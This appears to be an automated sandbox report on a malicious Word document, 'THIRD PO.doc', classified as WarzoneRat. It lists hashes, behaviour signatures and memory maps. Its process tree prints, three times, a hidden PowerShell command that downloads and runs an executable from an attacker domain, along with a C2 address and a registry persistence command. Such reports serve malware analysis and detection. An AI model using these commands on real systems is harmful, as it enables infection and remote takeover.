Analysis

  • max time kernel
    148s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    20-07-2021 18:38

General

  • Target

    THIRD PO.doc

  • Size

    1.0MB

  • MD5

    4126a02a7c1813d85e7aebae88257220

  • SHA1

    c84b7d02f15e5edd969f5815433321d2beb3784f

  • SHA256

    8f02443e60bace0a38ca66a09f628b5a5cb06e7ecc69011ed27b879f4eaa11c9

  • SHA512

    8bc6529b39dc2ff046551d1f176e51d0830cce92dab0bd41ce30d7021bf1711114ce97ade4336298106b3325811467f3655a17466add7319a9d013cde9e5ef42

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

httP://hutyrtit.ydns.eu/microC.exe

Extracted

Family

warzonerat

C2

sdafsdffssffs.ydns.eu:6703

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 7 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\THIRD PO.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://hutyrtit.ydns.eu/microC.exe','C:\Users\Admin\AppData\Roaming\microC.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\microC.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:840
      • C:\Users\Admin\AppData\Roaming\microC.exe
        "C:\Users\Admin\AppData\Roaming\microC.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:432
        • C:\Users\Admin\AppData\Local\Temp\microC.exe
          C:\Users\Admin\AppData\Local\Temp\microC.exe
          4⤵
          • Executes dropped EXE
          PID:1412
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe"
            5⤵
              PID:1904
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://hutyrtit.ydns.eu/microC.exe','C:\Users\Admin\AppData\Roaming\microC.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\microC.exe'"
        2⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:652
        • C:\Users\Admin\AppData\Roaming\microC.exe
          "C:\Users\Admin\AppData\Roaming\microC.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:920
          • C:\Users\Admin\AppData\Local\Temp\microC.exe
            C:\Users\Admin\AppData\Local\Temp\microC.exe
            4⤵
            • Executes dropped EXE
            PID:1164
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://hutyrtit.ydns.eu/microC.exe','C:\Users\Admin\AppData\Roaming\microC.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\microC.exe'"
        2⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1996
        • C:\Users\Admin\AppData\Roaming\microC.exe
          "C:\Users\Admin\AppData\Roaming\microC.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1692
          • C:\Users\Admin\AppData\Local\Temp\microC.exe
            C:\Users\Admin\AppData\Local\Temp\microC.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1624
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
              5⤵
                PID:1616
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
                  6⤵
                    PID:320
                • C:\ProgramData\images.exe
                  "C:\ProgramData\images.exe"
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:108
                  • C:\Users\Admin\AppData\Local\Temp\images.exe
                    C:\Users\Admin\AppData\Local\Temp\images.exe
                    6⤵
                    • Executes dropped EXE
                    PID:1080
                  • C:\Users\Admin\AppData\Local\Temp\images.exe
                    C:\Users\Admin\AppData\Local\Temp\images.exe
                    6⤵
                    • Executes dropped EXE
                    PID:812
          • C:\Windows\splwow64.exe
            C:\Windows\splwow64.exe 12288
            2⤵
              PID:340

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Defense Evasion

          Modify Registry

          1
          T1112

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\images.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • C:\ProgramData\images.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
            MD5

            02ff38ac870de39782aeee04d7b48231

            SHA1

            0390d39fa216c9b0ecdb38238304e518fb2b5095

            SHA256

            fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

            SHA512

            24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
            MD5

            75a8da7754349b38d64c87c938545b1b

            SHA1

            5c28c257d51f1c1587e29164cc03ea880c21b417

            SHA256

            bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

            SHA512

            798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
            MD5

            be4d72095faf84233ac17b94744f7084

            SHA1

            cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

            SHA256

            b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

            SHA512

            43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
            MD5

            df44874327d79bd75e4264cb8dc01811

            SHA1

            1396b06debed65ea93c24998d244edebd3c0209d

            SHA256

            55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

            SHA512

            95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb
            MD5

            597009ea0430a463753e0f5b1d1a249e

            SHA1

            4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

            SHA256

            3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

            SHA512

            5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
            MD5

            5e3c7184a75d42dda1a83606a45001d8

            SHA1

            94ca15637721d88f30eb4b6220b805c5be0360ed

            SHA256

            8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

            SHA512

            fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
            MD5

            a725bb9fafcf91f3c6b7861a2bde6db2

            SHA1

            8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

            SHA256

            51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

            SHA512

            1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9
            MD5

            b6d38f250ccc9003dd70efd3b778117f

            SHA1

            d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

            SHA256

            4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

            SHA512

            67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            MD5

            f56b5fa85c8724392d1e0f76e6a00a89

            SHA1

            f35fa856e5187c27ddda448c89c9510fa02fcba3

            SHA256

            4c721fa4a4c1edfdb61d80eb4204e256c9ba97f336389b4f12dd99ef87ea8afe

            SHA512

            763f0064893450dc6067a6e22e6c3ad37a00d5a1d4223508365af7ea5de162ab5e0e55cda381d24038bce630c86a0b6cebf8110cf4dae21bfe976148d1160cac

          • C:\Users\Admin\AppData\Local\Temp\images.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • C:\Users\Admin\AppData\Local\Temp\images.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • C:\Users\Admin\AppData\Local\Temp\images.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • C:\Users\Admin\AppData\Local\Temp\microC.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • C:\Users\Admin\AppData\Local\Temp\microC.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • C:\Users\Admin\AppData\Local\Temp\microC.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • C:\Users\Admin\AppData\Local\Temp\microC.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • C:\Users\Admin\AppData\Local\Temp\microC.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            MD5

            75a8d6f45616bdabba3e0898dc158616

            SHA1

            a6f829f42d3f7bcce145fdd0b158a0fdab41e1b6

            SHA256

            dcdd447b20919b325ca0bee07c9753f5111c5a647d5b180ab4182454b08bc5b8

            SHA512

            4545b5d00dd0c17ab31e946181342b03f200ff6b8a41ccdda7636a1b43f5dccec2bbda43cba47ff026f476ce1e2a6788e3bb1d2dc58fb2305f5c436536ff3f39

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            MD5

            75a8d6f45616bdabba3e0898dc158616

            SHA1

            a6f829f42d3f7bcce145fdd0b158a0fdab41e1b6

            SHA256

            dcdd447b20919b325ca0bee07c9753f5111c5a647d5b180ab4182454b08bc5b8

            SHA512

            4545b5d00dd0c17ab31e946181342b03f200ff6b8a41ccdda7636a1b43f5dccec2bbda43cba47ff026f476ce1e2a6788e3bb1d2dc58fb2305f5c436536ff3f39

          • C:\Users\Admin\AppData\Roaming\microC.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • C:\Users\Admin\AppData\Roaming\microC.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • C:\Users\Admin\AppData\Roaming\microC.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • C:\Users\Admin\AppData\Roaming\microC.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • \ProgramData\images.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • \Users\Admin\AppData\Local\Temp\images.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • \Users\Admin\AppData\Local\Temp\images.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • \Users\Admin\AppData\Local\Temp\microC.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • \Users\Admin\AppData\Local\Temp\microC.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • \Users\Admin\AppData\Local\Temp\microC.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • \Users\Admin\AppData\Roaming\microC.exe
            MD5

            c8efe4d8058465153a8b34af305bc9f3

            SHA1

            1e01cba90811b34b4b66208e929b087f74b7f1ad

            SHA256

            737475f65e8c970ed6aeaa3308e1e22fa7c3c87c6e15c52995b1a04cfeac2371

            SHA512

            ebbc1f784687c311f3169435c58619d5a32d66134a6b0a28826641d2c54440f49e5f5a38365b2e7dadb47d68600e59483f21209d252eed6bd37af24624d9ace3

          • memory/108-185-0x0000000004BF0000-0x0000000004BF1000-memory.dmp
            Filesize

            4KB

          • memory/108-178-0x0000000000000000-mapping.dmp
          • memory/320-183-0x0000000000000000-mapping.dmp
          • memory/340-138-0x0000000000000000-mapping.dmp
          • memory/340-139-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp
            Filesize

            8KB

          • memory/432-123-0x0000000000010000-0x0000000000011000-memory.dmp
            Filesize

            4KB

          • memory/432-135-0x0000000004C30000-0x0000000004C31000-memory.dmp
            Filesize

            4KB

          • memory/432-120-0x0000000000000000-mapping.dmp
          • memory/652-125-0x0000000006370000-0x0000000006371000-memory.dmp
            Filesize

            4KB

          • memory/652-88-0x0000000000000000-mapping.dmp
          • memory/652-105-0x0000000004C42000-0x0000000004C43000-memory.dmp
            Filesize

            4KB

          • memory/652-104-0x0000000004C40000-0x0000000004C41000-memory.dmp
            Filesize

            4KB

          • memory/812-197-0x0000000000405E28-mapping.dmp
          • memory/840-67-0x00000000048A0000-0x00000000048A1000-memory.dmp
            Filesize

            4KB

          • memory/840-64-0x0000000000000000-mapping.dmp
          • memory/840-66-0x00000000022F0000-0x00000000022F1000-memory.dmp
            Filesize

            4KB

          • memory/840-71-0x0000000005250000-0x0000000005251000-memory.dmp
            Filesize

            4KB

          • memory/840-68-0x00000000025C0000-0x00000000025C1000-memory.dmp
            Filesize

            4KB

          • memory/840-70-0x0000000004862000-0x0000000004863000-memory.dmp
            Filesize

            4KB

          • memory/840-74-0x0000000006030000-0x0000000006031000-memory.dmp
            Filesize

            4KB

          • memory/840-69-0x0000000004860000-0x0000000004861000-memory.dmp
            Filesize

            4KB

          • memory/840-89-0x00000000062C0000-0x00000000062C1000-memory.dmp
            Filesize

            4KB

          • memory/840-90-0x000000007EF30000-0x000000007EF31000-memory.dmp
            Filesize

            4KB

          • memory/840-80-0x00000000061C0000-0x00000000061C1000-memory.dmp
            Filesize

            4KB

          • memory/840-87-0x0000000006280000-0x0000000006281000-memory.dmp
            Filesize

            4KB

          • memory/840-79-0x00000000060D0000-0x00000000060D1000-memory.dmp
            Filesize

            4KB

          • memory/920-136-0x0000000004670000-0x0000000004671000-memory.dmp
            Filesize

            4KB

          • memory/920-127-0x0000000000000000-mapping.dmp
          • memory/1164-159-0x0000000000405E28-mapping.dmp
          • memory/1164-156-0x0000000000400000-0x000000000055E000-memory.dmp
            Filesize

            1.4MB

          • memory/1412-173-0x0000000000405E28-mapping.dmp
          • memory/1616-176-0x0000000000000000-mapping.dmp
          • memory/1624-158-0x0000000000405E28-mapping.dmp
          • memory/1624-170-0x0000000000400000-0x000000000055E000-memory.dmp
            Filesize

            1.4MB

          • memory/1692-137-0x00000000047A0000-0x00000000047A1000-memory.dmp
            Filesize

            4KB

          • memory/1692-150-0x0000000004830000-0x0000000004892000-memory.dmp
            Filesize

            392KB

          • memory/1692-140-0x00000000041C0000-0x000000000420B000-memory.dmp
            Filesize

            300KB

          • memory/1692-128-0x0000000000000000-mapping.dmp
          • memory/1756-60-0x0000000072821000-0x0000000072824000-memory.dmp
            Filesize

            12KB

          • memory/1756-63-0x0000000075FE1000-0x0000000075FE3000-memory.dmp
            Filesize

            8KB

          • memory/1756-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
            Filesize

            64KB

          • memory/1756-61-0x00000000702A1000-0x00000000702A3000-memory.dmp
            Filesize

            8KB

          • memory/1904-184-0x0000000000000000-mapping.dmp
          • memory/1904-186-0x00000000001E0000-0x00000000001E1000-memory.dmp
            Filesize

            4KB

          • memory/1996-92-0x0000000000000000-mapping.dmp
          • memory/1996-107-0x0000000004842000-0x0000000004843000-memory.dmp
            Filesize

            4KB

          • memory/1996-106-0x0000000004840000-0x0000000004841000-memory.dmp
            Filesize

            4KB